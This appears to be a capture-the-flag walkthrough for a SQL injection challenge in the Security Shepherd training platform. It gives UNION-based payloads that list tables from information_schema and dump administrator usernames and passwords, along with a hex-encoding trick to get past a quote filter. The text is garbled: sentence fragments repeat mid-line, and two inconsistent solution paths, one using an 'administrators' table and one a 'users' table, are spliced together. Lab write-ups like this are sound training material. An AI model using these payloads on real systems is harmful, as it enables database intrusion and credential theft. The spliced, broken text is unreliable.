With visible injection points (e.g., column positions 2 and 3), we query the information_schema database—the MySQL system catalog.
Payload to list tables:
1 AND 1=2 UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() -- -
Note: In Security Shepherd, you often need to URL-encode spaces and special characters. The -- - (space, hyphen, hyphen, space) terminates the query cleanly.
What you’re looking for: A table named users, administrators, or shepherd_users. Sql Injection Challenge 5 Security Shepherd
Now, combine everything.
Payload:
1 AND 1=2 UNION SELECT 1,admin_user,admin_pass FROM administrators -- -
If the challenge uses a single quote filter, you may need to use hex encoding:
FROM administrators WHERE admin_user=0x61646d696e (hex for 'admin') With visible injection points (e
The twist in Challenge 5: It often stores passwords as unsalted MD5 or SHA1. The flag is not the hash itself, but the plaintext value you must crack or a secondary token hidden in another column.
We need to know the table where user data is stored. In MySQL (which Shepherd typically uses), this data is in information_schema.tables.
Payload:
' UNION SELECT 1, table_name, 3 FROM information_schema.tables--
Note: We use numbers 1 and 3 as placeholders for the columns we don't care about seeing.
This injection will list table names. You look for a table named something like users or app_users.
Now we have all the pieces: Table (users) and Column (password). We modify our injection to dump the password for the Admin user. Note: In Security Shepherd, you often need to
Payload:
' UNION SELECT 1, password, 3 FROM users WHERE username='Admin'--
The application will execute the query. Instead of showing the search results for the original query, it will inject the result of our second query. The password (or flag) for the Admin user will appear in the spot where the username or other data is usually displayed on the webpage.